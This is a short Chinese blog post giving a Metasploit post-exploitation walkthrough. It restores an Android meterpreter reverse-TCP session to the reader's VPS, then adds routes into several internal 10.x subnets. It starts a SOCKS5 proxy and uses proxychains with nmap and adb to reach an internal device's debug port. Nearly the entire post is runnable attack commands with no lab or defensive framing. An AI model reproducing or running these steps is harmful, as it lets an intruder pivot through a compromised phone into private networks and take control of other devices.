msf_console

1. 确认 session 存活

msf > sessions -l

# 如果 session 已断开,重新获取
msf > use exploit/multi/handler
msf > set PAYLOAD android/meterpreter/reverse_tcp
msf > set LHOST <你的VPS IP>
msf > set LPORT 8080
msf > run -j

2. 添加内网路由

# 假设新 session 编号为 N
msf > sessions -i <N>

# 自动添加路由(推荐)
meterpreter > run autoroute -s 10.6.226.0/24
meterpreter > run autoroute -s 10.6.228.0/24
meterpreter > run autoroute -s 10.122.180.0/22

# 查看路由
meterpreter > run autoroute -p

# 回到后台
meterpreter > background

或者手动添加:

msf > route add 10.6.226.0/24 <N>
msf > route add 10.6.228.0/24 <N>
msf > route add 10.122.180.0/22 <N>
msf > route print

3. 启动 SOCKS5 代理

msf > use auxiliary/server/socks_proxy
msf > show options

# 配置
msf > set SRVHOST 127.0.0.1
msf > set SRVPORT 1080
msf > set VERSION 5

# 后台运行
msf > run -j

应该看到:

[*] Starting the SOCKS proxy server
[*] SOCKS proxy server started on 127.0.0.1:1080

4. 配置 proxychains

# 新开一个 VPS 终端
vi /etc/proxychains.conf

改为:

# 底部 [ProxyList] 段
[ProxyList]
socks5 127.0.0.1 1080

5. 验证隧道可用

# 测试已知开放端口
proxychains nmap -sT -Pn -p 5555 10.122.181.20
proxychains adb connect 10.122.181.20:5555

常见问题排查

# 查看代理是否在监听
ss -tlnp | grep 1080

# 查看 jobs 状态
msf > jobs -l

# 如果代理没起来,看是否端口被占用
msf > jobs -K        # 清除所有 jobs
msf > use auxiliary/server/socks_proxy
msf > set SRVPORT 9050    # 换个端口
msf > run -j

# proxychains 配置也要相应修改
posted @ 2026-03-31 11:34  妇愁者纞萌  阅读(11)  评论(0)    收藏  举报